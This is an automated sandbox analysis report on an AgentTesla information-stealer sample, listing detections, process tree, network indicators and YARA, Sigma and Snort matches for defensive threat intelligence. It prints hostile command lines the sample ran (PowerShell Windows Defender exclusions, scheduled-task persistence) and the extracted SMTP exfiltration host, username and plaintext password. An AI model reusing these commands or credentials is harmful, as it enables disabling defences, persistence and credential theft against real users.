Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GestorRemesasCONFIRMIMING.exe

Overview

General Information

Sample name:GestorRemesasCONFIRMIMING.exe
Analysis ID:1447920
MD5:b7db10ec32fe6f53ee4a76e261761c27
SHA1:283eb987f7ed2bfb1b4fbe413dd58b5ca8f31afd
SHA256:a0970a01c8310f5643451d71a863709b17e59814b12e81908f37cb649e3d70de
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GestorRemesasCONFIRMIMING.exe (PID: 3892 cmdline: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe" MD5: B7DB10EC32FE6F53EE4A76E261761C27)
    • powershell.exe (PID: 3132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6712 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2724 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XNYbGrcoFr.exe (PID: 5096 cmdline: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe MD5: B7DB10EC32FE6F53EE4A76E261761C27)
    • schtasks.exe (PID: 2276 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • XNYbGrcoFr.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe" MD5: B7DB10EC32FE6F53EE4A76E261761C27)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": "   cJPF@$I3   "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 19 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              14.2.XNYbGrcoFr.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
              • 0x34ac7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
              • 0x34b39:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
              • 0x34bc3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
              • 0x34c55:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
              • 0x34cbf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
              • 0x34d31:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
              • 0x34dc7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
              • 0x34e57:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
              0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32cc7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x32d39:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x32dc3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x32e55:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x32ebf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x32f31:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32fc7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x33057:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  11.2.XNYbGrcoFr.exe.3b11250.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 24 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe, ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ProcessId: 3132, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe, ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ProcessId: 3132, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe, ParentImage: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe, ParentProcessId: 5096, ParentProcessName: XNYbGrcoFr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp", ProcessId: 2276, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe, Initiated: true, ProcessId: 2760, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49705
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe, ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp", ProcessId: 2724, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe, ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ProcessId: 3132, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe", ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe, ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp", ProcessId: 2724, ProcessName: schtasks.exe

                    Snort Signatures

                    Timestamp:05/27/24-12:30:54.369627
                    SID:2030171
                    Source Port:49709
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/27/24-12:30:51.051527
                    SID:2030171
                    Source Port:49705
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: GestorRemesasCONFIRMIMING.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeAvira: detection malicious, Label: TR/AD.GenSteal.wukbo
                    Found malware configuration
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeReversingLabs: Detection: 63%
                    Multi AV Scanner detection for submitted file
                    Source: GestorRemesasCONFIRMIMING.exeReversingLabs: Detection: 63%
                    Source: GestorRemesasCONFIRMIMING.exeVirustotal: Detection: 57%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: GestorRemesasCONFIRMIMING.exeJoe Sandbox ML: detected
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49707 version: TLS 1.2
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: yuZb.pdbSHA256 source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr
                    Source: Binary string: yuZb.pdb source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 4x nop then jmp 06A4AD75h0_2_06A4AEAA
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 4x nop then jmp 06A19F6Dh11_2_06A1A0A2

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49705 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49709 -> 208.91.198.143:587
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49705 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.6:49705 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: smtp.santonswitchgears.com
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.000000000260A000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2166350943.000000000285A000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.santonswitchgears.com
                    Source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsdIDataAccessLayer.Properties.Resources
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49707 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, lBLTBzkV.cs.Net Code: yom
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, lBLTBzkV.cs.Net Code: yom

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 14.2.XNYbGrcoFr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
